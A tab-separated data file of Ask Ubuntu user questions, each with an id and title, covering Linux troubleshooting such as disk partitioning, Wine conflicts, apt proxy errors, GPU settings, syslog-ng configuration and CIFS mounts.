409940	gnome color manager , to/from srgb tabs	when i open gnome-color-manager , select a profile , and hit `` view details '' , there are two tabs labeled `` from srgb '' and `` to srgb '' . i 'm not sure exactly what these are , but i assume that you want them to be the same . mine are very different , with the `` from srgb '' looking about right and the `` to srgb '' looking very dull and wrong . i have a monitor that has been calibrated with the i1 display pro and dispcalgui . why are these images so wrong ? i also notice that if i load a picture into gimp and select to use the system color profile under color management , that is looks dull and incorrect ( like `` from srgb '' above ) . if i turn off the color management in gimp , it looks more correct ( like `` to srgb '' ) . i do n't know if these are related , but i 'm thinking that they probably are .
409946	broken libraries	i inadvertently wrote the wrong stuff into /usr/lib/x86_64-linux-gnu and heaps of things are now broken . is there a way to recover this library ? i am using ubuntu server ubuntu 12.04.2 lts .
409949	will this backup the partition contents of both linux and windows ?	the partition table of my /sda disk got corrupted . i do n't know the details of what happened exactly , but i can still read the disk , and boot into linux , but not into windows 8 anymore . i 'm quite new to linux and this does n't seem to be easy to fix , so i decided to just backup my data to another disk , format the /sda disk , and put the data back . /sda contains : /sda2 which is win8 *ntfs* /sda3 is an extended partition containing : /sda5 which is linux / ( filesystem root ) *ext4* /sda6 which is swap . /sdb is a one partition ntfs disk containing no os , and only data . /sdc5 , a partition on my third disk , contains /home . ext4 here is how i was planning to backup my data : boot linux from usb , use sudo cp -afv to copy /sda5 contents to a folder on /sdc5 , use sudo cp -afv to copy /sda2 contents to a folder on the /sdb disk . format the /sda disk , partition it the same way again , and copy the data back using the same sudo cp -afv command ( all from a linux live usb ) . so my big question is , will all this work ? details regarding my partition problem in case you 're interested .
409950	wine nsf screen resolution	i play nfs with wine in kubuntu . as usual , nfs changed my screen resolution to low , but after it finished , it did n't restore the screen to normal resolution . i found some code to restore the resolution , but i have to restart the system . is there any other solution without restarting ?
409951	ubuntu 12.10 gnome system monitor high cpu usage	i am totally new to ubuntu . i tried to install numerous times , but always removed it because of loud fan noise . me and my bro have the same notebook , a hp compaq 615 , and what grabbed my attention that no apps where running the fan was still loud , so i opend up system monitor and saw that the gnome system monitor and saw that the gnome system monitor uses a lot of cpu , the value jumped up and down for a few seconds , but after it always used 50-60 % of my cpu , i think thats a bit pretty large . than another research , i saw that the video card is not detected , we have an ati mobility radeon hd 3200 , but i did not install it because , every time i tried to install back in time and reboot i was never able to log back in to ubuntu because i got just a purple background and a bog saying error . so my question is , can this high cpu problem caused by that my video card is not detected ? thank you
409956	unable to download from multiple sites with uget	i 've downloaded uget with aria2 and everything works fine when i only download from one server . when i activate aria plugin to download from more than one server connections a get this messages and the download never start .
409959	disabling discrete gpu at startup without system crash	i have a hard-wired ( i.e not multiplex ) nvidia geforce 540m discrete gpu with an integrated intel graphics card . i have no need for the discrete graphics card and am trying to disable it completely ( at the moment , they are both powered on ) . i am familiar with hybridgraphics on ubuntu and the various on/off commands , and read these two posts to help me achieve this how to permanently switch off discrete graphic card ? and this from ubuntuguide . unfortunately , both the tutorials suggest editing /etc/rc.local file by adding switcheroo commands . i have tried this and my system completely refuses to boot when i edit the rc.local ; i had to restore the original file to regain access ubuntu . are there other methods which i can use to disable my gpu safely ?
409962	after installing catalyst center , my ubuntu 13.10 has changed user password	i tried installing two fresh installs , but every time i restart i 'm asked for a password as usual . but the one i have used to have does n't work . it 's a radeon hd 4530 card .
409964	how to make windows compatible ppt on ubuntu 12.04 ?	sir , i need to create a ppt in ubuntu but i need the themes of microsoft powerpoint or you can say windows compatible presentation . could you please suggest me a way to do this . thanks
409973	getting the e-book reader	what are the popular e-book readers for ubuntu ? i am trying to download books in electronic format but i do n't know any suitable e-book reader .
409988	tree-like content display in nautilus	is there a way to have os x-like behavior in nautilus ? nautilus elementary is long gone ? basically i 'd like to have an option to a tree view ( only 2 views , not multiple like in max os x ) where the parent will be on the left , and the content on the right . on mac os x , it looks like this possible something similar on ubuntu ?
409991	upstart job works only with manual start/stop	i have a very small upstart job in /etc/init/tsm.conf to start backup client after network starts . it works just ok if i start/stop it manually via service tsm start|stop|status . but service tsm enable says tsm : unrecognized service . so it does n't start on boot automatically . sudo service -- status-all also does n't show it in the list of known jobs . here it is : start on started networking stop on stopped networking respawn script # ! /bin/bash dsmc schedule > /dev/null end script i run ubuntu 12.04.4 . upstart version is 1.5-0ubuntu7.2 . could anybody help me ? : ) update using initctl list and other initctl commands shows my job .
409998	proxy blocking apt-get , allowing wget/curl	i 'm having an issue getting passed my corporate proxy server . i had an exception put in place to allow my ip address to pass through , but have n't been able to get apt-get to work . wget can get to the ubuntu repos without any issues . root @ server : /tmp # http_proxy=http : // < proxy > :8080 wget http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages.bz2 -- 2014-01-24 09:17:38 -- http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages.bz2 resolving < proxy > ( < proxy > ) ... x.x.x.25 , x.x.x.24 connecting to < proxy > ( < proxy > ) |x.x.x.25|:8080 ... connected . proxy request sent , awaiting response ... 200 ok length : 5178 ( 5.1k ) [ application/x-bzip2 ] saving to : `packages.bz2' 100 % [ ======================================== > ] 5,178 -- .-k/s in 0.001s 2014-01-24 09:17:38 ( 7.78 mb/s ) - `packages.bz2 ' saved [ 5178/5178 ] root @ server : /tmp # ll -h total 16k drwxrwxrwt 2 root root 4.0k jan 24 09:17 ./ drwxr-xr-x 23 root root 4.0k jan 16 14:14 ../ -rw-r -- r -- 1 root root 5.1k jan 24 09:05 packages.bz2 root @ server : /tmp # i setup my apt-conf.d proxy configurations . root @ server : /tmp # cat /etc/apt/apt.conf.d/30proxy acquire : :http : :proxy `` http : // < proxy > :8080 '' ; acquire : :ftp : :proxy `` ftp : // < proxy > :8080 '' ; acquire : :https : :proxy `` https : // < proxy > :8080 '' ; root @ server : /tmp # apt-get still fails with a 403 forbidden error . root @ server : /tmp # apt-get update ign http : //us.archive.ubuntu.com precise release.gpg < ... snipped excess ... > ign http : //us.archive.ubuntu.com precise-backports/universe translationindex err http : //security.ubuntu.com precise-security/main sources 403 forbidden [ ip : x.x.x.25 8080 ] < ... snipped excess ... > err http : //security.ubuntu.com precise-security/multiverse i386 packages 403 forbidden [ ip : x.x.x.25 8080 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/source/sources 403 forbidden [ ip : x.x.x.24 8080 ] < ... snipped excess ... > w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-i386/packages 403 forbidden [ ip : x.x.x.25 8080 ] e : some index files failed to download . they have been ignored , or old ones used instead . root @ server : /tmp # proxy replaces my proxy server 's fqdn
410002	screen goes blank on asus s56cm-ultrabook when installing ubntu 12.04	i brought new asus s56cm-x0177h ultrabook . it has pre loaded windows 8 . i want to make it dual boot but when i tried to install ubuntu 12.0.4. when i click on `` install ubuntu '' from my bootable usb drive screen goes blank and nothing is happen . i checked both fast boot and secure boot are disable . any help .
410004	ubuntu-12.04.3-desktop-i386 installation as dual boot on probook 4430s	i have windows 7 already installed , and now i 'm trying to install ubuntu alongside it . during installation i faced the following problems : the option of install ubuntu alongside windows was not available . in the option something else the unallocated space or free space was shown . also it does n't show the logical partitions but shows it under extended partition sd4 . it showed partitions sda1 to sda4 of which sda1 and sda2 are obviously system and bootloader partitions . sd3 is i think my hp_recovery drive and sd4 is the extended drive of 300gb . my extended partition has 2 logical partitions d and h. i unallocated 70gb of space by disk management from drive h. correct me if i am wrong , but i think problem 1 is because of the fact that i already have 4 primary partitions . i am also aware that ubuntu can be installed in a logical partition . so my question is : can i install ubuntu without formatting my whole extended partition , and is there any way to see the logical partitions in the table obtained after clicking something else ?
410010	wine version conflict causing update manager to crash	i attempted to update wine from my existing 1.5 by installing 1.7 through apt-get but apparently it only partially succeeded . now it looks like i 'm trapped in a catch-22 : when i try to install 1.7 it fails because 1.5 is already installed and is using some of the same files . i apparently ca n't remove either 1.5 or the installed portion of 1.7 because of the unmet dependency . running apt-get -f install makes it try to install wine1.7-i386 but this fails : unpacking wine1.7-i386 : i386 ( from ... /wine1.7-i386_1 % 3a1.7.11-0ubuntu1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/wine1.7-i386_1 % 3a1.7.11-0ubuntu1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/wine ' , which is also in package wine1.5 1.5.5-0ubuntu1~ppa1~oneiric1+pulse17 errors were encountered while processing : /var/cache/apt/archives/wine1.7-i386_1 % 3a1.7.11-0ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) running apt-get autoclean after that removes wine1.7-i386 but either way i ca n't seem to get beyond that . also , ubuntu update manager crashes on load , obviously due to the same error . any advice will be appreciated . thanks .
410011	no application in unity dash after upgrade packages in ubuntu 13.10	i regularly upgrade system . last night i upgraded some packages ( ubuntu-base ) . now there is not application in unity dash ( in application lens ) . other lens ( file , music etc ) are just working fine . only problem is that i ca n't see any application in application lens .
410014	chrome/ium rendering problems with intel graphics	this is a kinda weird question i do n't know what to file it under but this is the behaviour i observe when i try to access pages like facebook ( it happened once with google as well . happens with tumblr now too ) . this is a new thing so i have n't really tried to figure out which pages trigger this , i just switched to firefox which seems to work ok ( because i am in the middle of some work that needs to be done without interruptions . the first time this occured i left the page open and tried to figure out what happened the whole graphics turned off and it went to terminal . i recently installed a ram dimm ( if you think that might be somehow related ) my setup : cpu : intel® pentium ( r ) cpu b960 @ 2.20ghz × 2 64bit gpu : intel® sandybridge mobile ram : 7.6g thanks in advance ! edit : appears to be happening with bookmark manager as well !
410016	why does remote server over ssh prompt for password even if i locked user ?	i created ubuntu server in virtualbox and created additional user . than locked it with passwd -l user . then when i try to ssh that user , it keeps asking for password , but even if i input password , that was there before locking , it appears it is n't valid . i 'm new to ubuntu so i 'm a bit confused here .
410020	why this hotkey combination : `` super+v '' did n't work ?	i 'm fairly a newbie in ubuntu . ( the first day ... ) i want to set my own hotkey , but totally failed . here is what i 've done : set my own hotkey : but if i press super + v , it 'll be like this : at first , i thought the command was wrong , so i tested in terminal : it can be launched successfully ! so , any steps went wrong ? why this hotkey combination did n't work ? environment : wubi ( ubuntu 12.04 lts ) in windows 7 .
410022	why does /proc/cpuinfo say `` cpu cores : 2 '' on an amd fx-4100 quad-core processor	i 'm trying to figure out how to interpret my /proc/cpuinfo . i 've got an amd fx-4100 quad-core and cpuinfo gives , as it should , 1 'physical id ' , 4 'core id 's and 4 'siblings ' , but why does 'cpu cores ' say 2 instead of 4 ? also , the fx-4100 specs say 4mb l2 cache yet cpuinfo says 2mb . included below is the text for processor 0. processor : 0 vendor_id : authenticamd cpu family : 21 model : 1 model name : amd fx ( tm ) -4100 quad-core processor stepping : 2 microcode : 0x600063d cpu mhz : 1400.000 cache size : 2048 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc $ bogomips : 7248.64 tlb size : 1536 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : ts ttp tm 100mhzsteps hwpstate cpb
410023	blocking specific mac address from contacting me on local network	could i block a specific mac address on my lan from contacting me ? i know i could do it from router or switch . but i wan na learn if it is possible in ubuntu ( linux ) commands .
410024	how can i clean up xml contact files from windows ?	i copied my windows vista `` contacts '' file into ubuntu and , to my surprise , i can actually read them in firefox but they 're mixed with a lot of extraneous code so they 're messy to read and use . is there a way in ubuntu 12.04 to format these xml files so they come out cleaner . thanks in advance for any ideas .
410029	setting up remote access to vps where wine runs ; is window manager needed ?	i have a vps running ubuntu 12.04 . my purpose is to let a windows application run under wine , around the clock , 24/7 . it consists of two .exe 's , both have to open their guis to run . from time to time i would like to have look on them , by connecting to vps from my windows laptop . i do not mind launching applications in wine conncting with ssh and using command line ; but i do need seeing their guis afterwards . knowing that , what do you think is an appropriate way to run wine ( using it 's own window manager or ubuntu 's one ) and arranging remote access ( vnc ? something else ? ) ?
410032	how can i increase my ram size with a swap partition ?	presently my ram is 2gb . i heard that in linux we can get extra memory to ram from the harddisk by using swap partition . what is the procedure for that ? here in the pics i 'm giving my system info .
410036	wifi issue with ubuntu 13.10 and lenovo ideapad s405	i installed ubuntu 13.10 on my laptop lenovo ideapad s405 . it 's showing all wifi connection.and also connecting to wifi . but it does n't doing data transfer . pages are not loading in browser . i have check internet connection its working fine with ethernet connect but not with wifi . network adpter : broadcom corporation bcm4313 802.11bgn wireless network adapter . please help .
410045	`` the package lists or status file could not be parsed or opened ''	everytime i sudo apt-get update it always not complete and will say in the end e : read error - read ( 5 : input/output error ) e : the package lists or status file could not be parsed or opened . same goes , when i try to install something and do sudo apt-get install < some app > what should i do ? i admit , that my drive has bad sectors , could that be the reason ? is there anything else i can do ?
410048	utf-8 character not showing properly in tmux	i use ♪ character in my zsh theme 's for prompt . but in tmux , my prompt was behaving weirdly , showing extra spaces , like this : ♪ ~ i can type from here ♪ ~ instead of here like in zsh , and sometimes when i do stuff like cd ♪ ~ cd ~ ♪ ~ cdcd / ♪ ~ ^^these 2 chars just show up but are not actually part of command and not delete-able i recently discovered that i can set tmux encoding to utf8 by set-window-option -g utf8 on . doing that , the space problem was gone but ♪ character changed to _ . how can i get my ♪ back in tmux ? my zsh-theme : prompt= ' % { $ fg_bold [ cyan ] % } ♪ % { $ fg [ blue ] % } % c % { $ fg_bold [ blue ] % } $ ( git_prompt_info ) $ ( git_remote_status ) % { $ fg_bold [ blue ] % } % % { $ reset_color % } '
410049	sd4 is nested ! for example sda5 is a child of sda4 ! ubuntu does not allow me to create any other partition !	below pictures ( captured form gparted ) show my problems ! sda1 - > windows system reserved ( created automatically by windows os ) - > primary sda2 - > win 8.1 - > primary sda3 - > ubuntu - > primary sda5 - > swap as a logical partition , marked as 'beginning' sda6 - > home partition as a logical partition , marked as 'end' now , there is a little free space that i want to install a new linux distro on it , but when i try to create a new extended-logical partition i get this error : can not create a new partition . there are already four primary partitions . why ubuntu created sda4 while i had choosed 'logical ' for both swap & home partitions . how can i get rid of sda4 and make a new partition ? more details are here : sudo parted -l model : ata st3500412as ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 368mb 367mb primary ntfs boot 2 368mb 70.6gb 70.2gb primary ntfs 3 70.6gb 101gb 30.7gb primary ext4 4 101gb 463gb 361gb extended 5 101gb 104gb 3071mb logical linux-swap ( v1 ) 6 104gb 463gb 358gb logical ext4 sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd42cd17a device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 137912319 68596736 7 hpfs/ntfs/exfat /dev/sda3 137912320 197912575 30000128 83 linux /dev/sda4 197914622 903913471 352999425 5 extended /dev/sda5 197914624 203913215 2999296 82 linux swap / solaris /dev/sda6 203915264 903913471 349999104 83 linux
410050	how to fix ubuntu 13.10 locking up due to disk io	i 've been an ubuntu fan for many years , and have had no issues to speak of so far , but since i 've bought a new laptop , i 've run into an issue that i ca n't figure out how to deal with . after about 2-3 hours of sustained usage , my computer irrevocably locks up completely . it starts running slowly for a few minutes , having some stutter and other issues , and eventually the entire system just freezes . i 've been able to capture a screen of my iotop when the problem is occuring , which seems to be the issue . top is showing nothing out of the ordinary , except a steadily increasing load . please note that this is the last i saw anything on my screen change , after this it was completely frozen . i 'm quite out of my depth . since none of the programs i 'm running seem to be the culprit specifically , i ca n't really uninstall something and be done . the system in question is a laptop with the following specs : intel core i7 620m 2,66ghz quadro fx 880m 4gb ddr3 7200rpm 320gb how could i fix ( or find ) this issue ?
410053	how do i install 3rd party programs and make them appear in the dash home menu ?	i just downloaded sublime text editor , and i unpacked the tarball . however , now i want to make it searchable in the dash board menu , like all applications that are installed using the ubuntu software center . how do i do it ?
410054	virtual box attaching usb devices needs sudo	i have virtualbox installed in my kubuntu 13.10 . i installed lubuntu in vitualbox but usb devices can not be attached to it unless i run virtual box as root . how can i solve this poblem ? ( so that root is not needed to attach usb devices ) .
410055	how can i upgrade 32bit 12.04 lts to 64-bit 12.04lts ubuntu	i just want to upgrade my ubuntu 12.04lts 32-bit to 64-bit . i want to install software which woks well with 64-bitos.i do n't want to reinstall because i have done installing and uninstalling different os for pretty many times.i am worried if installing os again may corrupt mother bootable record and may slows down the system speed . so i just want to upgrade.could please suggest me the installation instructions for that
410057	tor in command prompt	is there any way to use tor in terminal ( or any other software like tor in command-line ) . i need this for updating my ubuntu , as my network not allows to download more than 20mb file . because of this i have to download files which are more than 20mb in size using tor-browser one by one . please let me know any other way to solve this .
410065	change keyboard layout for a specific input in ubuntu 13.10	in text entry settings , i have two input sources : french and vietnamese . the problem is , the french input uses an azerty layout ( like the physical keyboard of my laptop ) while the vietnamese input uses an qwerty one , which is very annoying . could anybody please tell me how to either set a fixed keyboard layout for all input sources or set the keyboard layout of the vietnamese input to azerty ? thank you in advance .
410069	wubi - grub shows older ubuntu installation boot entry	i am new to linux , i 've installed ubuntu 12.04 with wubi and updated its kernel . i 've uninstalled ubuntu and installed 12.10 with wubi but at first boot , instead of showing installation the grub boot menu shows old one 's name and when i press enter , shows error : the system type is different . pls help me fix it
410071	fix corrupted external hdd	my seagate hdd is not working properly , connecting it via usb , it gives me this error : error mounting /dev/sdb1 at /media/sourabh/650ba44f641eeb54 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/sourabh/650ba44f641eeb54 '' ' exited with non-zero exit status 13 : the disk contains an unclean file system ( 0 , 0 ) . the file system was n't safely closed on windows . fixing . ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . failed to sync device /dev/sdb1 : input/output error failed to close volume /dev/sdb1 : input/output error and $ sudo parted /dev/sdb print error : /dev/sdb : unrecognised disk label here 's a screenshot of gparted : ps : the data on it is not important . i think there is some problem with the partition table , maybe ? in that case , how can i rebuild the partition table ?
410072	windows installer ( wubi ) stops	when installing with windows installer ( wubi ) in xp , installation stops allways when doing `` reticulating splines ... '' and the laptop freezes
410076	syslog-ng not writing to 2 destinations	i have setup syslog-ng to log to a mssql destination and that all works well . however , if i specify a second destination ( same database but different table ) with a seperate log command that uses a different filter to identify the traffic i want in that table , logging does not work . i assumed it was to do with threading so i enabled threading but still see the same . i am using ubuntu 13.04 raring and version 3.5.3 of syslog-ng ose . anyone else seen this problem ? thanks pete thanks for the reply tom . the relevant sections of the syslog-ng.conf file are below . i have put on both the destination and log for each table that i want data in . at the moment , this is a test so the parsers are the same but i am trying to split out the traffic as the parsers will be different . what i find is that if i start syslog-ng , sometimes i get data being sent to one of the database tables but not the other , or neither gets data sent . i 've run a sql profile and the insert statement is not seen so its not a sql issue . other things that may have an effect , the syslog-ng server is running on hyper-v but i 've allocated 4 logical cpu 's to it , but i 'm thinking that if each sql destination uses a seperate thread , ubuntu might not be handling virtualisation and so not presenting the cpus to the app . your thoughts on that would be appreciated . relevant sections of the .conf file below : options { threaded ( yes ) ; } ; source s_net { udp ( ip ( x.x.x.x ) port ( 514 ) flags ( `` syslog-protocol '' , `` threaded '' ) ) ; } ; destination d_mssql { sql ( type ( mssql ) host ( `` x.x.x.x '' ) port ( 1433 ) username ( `` ****** '' ) password ( `` ******** '' ) database ( `` syslog-ng '' ) table ( `` bmthfwtrafficaccepted $ { r_day } $ { r_month } $ { r_year } '' ) columns ( `` time varchar ( 16 ) '' , `` devname varchar ( 50 ) '' , `` device_id varchar ( 50 '' , '' log_id varchar ( 16 ) '' , `` type varchar ( 16 ) '' , `` subtype varchar ( 16 ) '' , `` pri varchar ( 16 ) '' , '' vd varchar ( 16 ) '' , `` src varchar ( 16 ) '' , `` src_port varchar ( 16 ) '' , `` src_int varchar ( 16 ) '' , '' dst varcar ( 16 ) '' , `` dst_port varchar ( 16 ) '' , `` dst_int varchar ( 16 ) '' , `` sn varchar ( 16 ) '' , '' statuc varchar ( 16 ) '' , `` policyid varchar ( 16 ) '' , `` dst_country varchar ( 255 ) '' , '' src_country varchar ( 255 ) '' , `` dir_disp varchar ( 16 ) '' , `` tran_disp varchar ( 16 ) '' , '' tran_ip varchar ( 16 ) '' , `` tran_port varchar ( 16 ) '' , `` service varchar ( 16 ) '' , `` proto varchar ( 16 ) '' , '' duration varchar ( 16 ) '' , `` sent varchar ( 16 ) '' , `` rcvd varchar ( 16 ) '' , `` sent_pkt varchar ( 16 ) '' , '' rcvd_pkt varchar ( 16 ) '' values ( `` $ { fortinet.time } '' , `` $ { fortinet.time } '' , `` $ { fortinet.devname } '' , `` $ { fortinet.device_id } '' , '' $ { fortinet.log_id } '' , `` $ { fortinet.type } '' , `` $ { fortinet.subtype } '' , `` $ { fortinet.pri } '' , '' $ { fortinet.vd } '' , `` $ { fortinet.src } '' , `` $ { fortinet.src_port } '' , `` $ { fortinet.src_int } '' , '' $ { fortinet.dst } '' , `` $ { fortinet.dst_port } '' , `` $ { fortinet.dst_int } '' , `` $ { fortinet.sn } '' , '' $ { fortinet.status } '' , `` $ { fortinet.policyid } '' , `` $ { fortinet.dst_country } '' , `` $ { fortinet.src_country } '' , '' $ { fortinet.dir_disp } '' , `` $ { fortinet.tran_disp } '' , `` $ { fortinet.tran_ip } '' , `` $ { fortinet.tran_port } '' , '' $ { fortinet.service } '' , `` $ { fortinet.proto } '' , `` $ { fortinet.duration } '' , `` $ { fortinet.sent } '' , '' $ { fortinet.rcvd } '' , `` $ { fortinet.sent_pkt } '' , `` $ { fortinet.rcvd_pkt } '' ) ) ; } ; destination d_mssql2 { sql ( type ( mssql ) host ( `` x.x.x.x '' ) port ( 1433 ) username ( `` ****** '' ) password ( `` ******** '' ) database ( `` syslog-ng '' ) table ( `` bmthfwtrafficaccepted $ { r_day } $ { r_month } $ { r_year } '' ) columns ( `` time varchar ( 16 ) '' , `` devname varchar ( 50 ) '' , `` device_id varchar ( 50 '' , '' log_id varchar ( 16 ) '' , `` type varchar ( 16 ) '' , `` subtype varchar ( 16 ) '' , `` pri varchar ( 16 ) '' , '' vd varchar ( 16 ) '' , `` src varchar ( 16 ) '' , `` src_port varchar ( 16 ) '' , `` src_int varchar ( 16 ) '' , '' dst varcar ( 16 ) '' , `` dst_port varchar ( 16 ) '' , `` dst_int varchar ( 16 ) '' , `` sn varchar ( 16 ) '' , '' statuc varchar ( 16 ) '' , `` policyid varchar ( 16 ) '' , `` dst_country varchar ( 255 ) '' , '' src_country varchar ( 255 ) '' , `` dir_disp varchar ( 16 ) '' , `` tran_disp varchar ( 16 ) '' , '' tran_ip varchar ( 16 ) '' , `` tran_port varchar ( 16 ) '' , `` service varchar ( 16 ) '' , `` proto varchar ( 16 ) '' , '' duration varchar ( 16 ) '' , `` sent varchar ( 16 ) '' , `` rcvd varchar ( 16 ) '' , `` sent_pkt varchar ( 16 ) '' , '' rcvd_pkt varchar ( 16 ) '' values ( `` $ { fortinet.time } '' , `` $ { fortinet.time } '' , `` $ { fortinet.devname } '' , `` $ { fortinet.device_id } '' , '' $ { fortinet.log_id } '' , `` $ { fortinet.type } '' , `` $ { fortinet.subtype } '' , `` $ { fortinet.pri } '' , '' $ { fortinet.vd } '' , `` $ { fortinet.src } '' , `` $ { fortinet.src_port } '' , `` $ { fortinet.src_int } '' , '' $ { fortinet.dst } '' , `` $ { fortinet.dst_port } '' , `` $ { fortinet.dst_int } '' , `` $ { fortinet.sn } '' , '' $ { fortinet.status } '' , `` $ { fortinet.policyid } '' , `` $ { fortinet.dst_country } '' , `` $ { fortinet.src_country } '' , '' $ { fortinet.dir_disp } '' , `` $ { fortinet.tran_disp } '' , `` $ { fortinet.tran_ip } '' , `` $ { fortinet.tran_port } '' , '' $ { fortinet.service } '' , `` $ { fortinet.proto } '' , `` $ { fortinet.duration } '' , `` $ { fortinet.sent } '' , '' $ { fortinet.rcvd } '' , `` $ { fortinet.sent_pkt } '' , `` $ { fortinet.rcvd_pkt } '' ) ) ; } ; filter f_fortinetaccept { match ( `` accept '' value ( `` fortinet.status '' ) type ( `` string '' ) ) ; } ; filter f_fortinetreserverd { match ( `` reserved '' value ( `` fortinet.src_country '' ) type ( `` string '' ) ) ; } ; parser p_fortinetaccept { csv-parser ( columns ( `` fortinet.timecol '' , '' fortinet.time '' , `` fortinet.devnamecol '' , `` fortinet.devname '' , '' fortinet.device_idcol '' , `` fortinet.device_id '' , `` fortinet.log_idcol '' , `` fortinet.log_id '' , '' fortinet.typecol '' , `` fortinet.type '' , `` fortinet.subtypecol '' , `` fortinet.subtype '' , `` fortinet.pricol '' , '' fortinet.pri '' , `` fortinet.vdcol '' , `` fortinet.vd '' , `` fortinet.srccol '' , `` fortinet.src '' , '' fortinet.src_protcol '' , `` fortinet.src_prot '' , `` fortinet.src_intcol '' , `` fortinet.src_int '' , '' fortinet.dstcol '' , `` fortinet.dst '' , `` fortinet.dst_portcol '' , `` fortinet.dst_port '' , '' fortinet.dst_intcol '' , `` fortinet.dst_int '' , `` fortinet.sncol '' , `` fortinet.sn '' , '' fortinet.statuscol '' , `` fortinet.status '' , `` fortinet.policyidcol '' , `` fortinet.policyid '' , '' fortinet.dst_countrycol '' , `` fortinet.dst_country '' , `` fortinet.src_countrycol '' , '' fortinet.src_country '' , `` fortinet.dir_dispcol '' , `` fortinet.dir_disp '' , '' fortinet.tran_dispcol '' , `` fortinet.tran_disp '' , `` fortinet.tran_ipcol '' , `` fortinet.tran_ip '' , '' fortinet.tran_portcol '' , `` fortinet.tran_port '' , `` fortinet.servicecol '' , `` fortinet.service '' , '' fortinet.protocol '' , `` fortinet.proto '' , `` fortinet.durationcol '' , `` fortinet.duration '' , '' fortinet.sentcol '' , `` fortinet.sent '' , `` fortinet.rcvdcol '' , `` fortinet.rcvd '' , '' fortinet.sentpktcol '' , `` fortinet.sent_pkt '' , `` fortinet.rcvd_pktcol '' , `` fortinet.rcvd_pkt '' ) flags ( escape-double-char , strip-whitespace ) delimiters ( `` = `` ) quote-pairs ( ' '' '' ' ) ) ; } ; log { source ( s_net ) ; parser ( p_fortinetaccept ) ; filter ( f_fortinetaccept ) ; destination ( d_mssql ) ; } ; log { source ( s_net ) ; parser ( p_fortinetaccept ) ; filter ( f_fortinetreserved ) ; destination ( d_mssql2 ) ; } ;
410084	how to take control of powermiz performance levels in the nvidia-settings	i have noticed my laptop temperature is going high all the time . i suspected the vega card which is nvs 5200m . so i opened the nvidia-settings and i found the level of performance stuck at the highest level all the time . i would like to know how to change it either by using gui or command line knowing that i tried to change the mode of the powermizer to adaptive but with the same result .. so please help if you can
410086	problem with multiple cifs shares	i have use two cifs network shares . one is public and all users have permissions to access it - /media/nas/media . i want all files and folders i create to be accessible to all other users . the other share , /media/nas/sharp , is private and only i have access to it , so i do n't need to worry about file permissions . here 's my settings from /etc/fstab : //192.168.1.2/media /media/nas/media cifs rw , dir_mode=0755 , file_mode=0755 , nounix , credentials=/etc/nas_cred , user , noauto 0 0 //192.168.1.2/sharp /media/nas/sharp cifs rw , credentials=/etc/nas_cred , user , noauto 0 0 i had to experiment a bit with dir_mode , file_mode and nounix , because the server is unix-based , but i use cifs so windows workstations can access the files . this setting worked fine for me for some time , but now i have the following problem . when i mount /media/nas/media , it works as intended . but when i also mount /media/nas/sharp , all files and folders from /media/nas/media seem to disappear , even though it stays mounted . if i try umount and mount again , it does n't solve the problem . the only solution i found is to restart the computer . since /media/nas/sharp does n't have this problem ( it works just fine , if i try to mount the other share as well ) , i suspect there might be a problem with the configuration in /etc/fstab . i 'm using ubuntu 13.10 and windows workstations have no such problems . what could be causing this issue , and how could i fix it ?
410090	preview of cad files in format .dwg	i 'm looking for a utility or a program for ubuntu , and possibly even for windows that is able to convert a cad file format .dwg to pdf . my need is to provide a preview of cad files , and i thought that the easiest way is to convert them into pdf format , but i 'm open to suggestions , even if there is only the possibility to convert them to jpg image file type or png would be fine . what interests me is only to find some solution , no matter if it is commercial or free
410091	mpdboot and mpdtrace gives alarm clock as a result	i try to execute mpdboot -n 2 -f /home/user/mpd.hosts and then mpdtrace however , both of them gives strange result as alarm clock can somebody tell me what is wrong with that , please thanks i should equipped the question with more information ( 24 jan 14 18:38 ) . i have a virtual machine with mpd installed on it . then i copy the *.vdi ( the hard drive ) to another machine .
410107	lubuntu installation stalls on toughbook cf-51	trying to install lubuntu 12.04 alternate on panasonic toughbook cf-51 : cpu : intel centrino mobile pentium-m 1,7ghz ram : 512mb , pc2700 333mhz ddr sdram hard drive : 60.0gb 4200rpm optical drive : dvd-cd/rw when lubuntu boot cd is loaded i choose `` install lubuntu '' option , disk drive starts spinning madly , then becomes quiet as if reading really slowly . this can go on for more than an hour and the screen never changes . i 'm still being presented with the main menu ( install lubuntu , check disk for defects , test memory , etc . ) in about half an hour errors start showing up : `` edd : error 8000 reading sector xxxxxx '' . does anybody have any ideas how to install lubuntu on this laptop ? : )
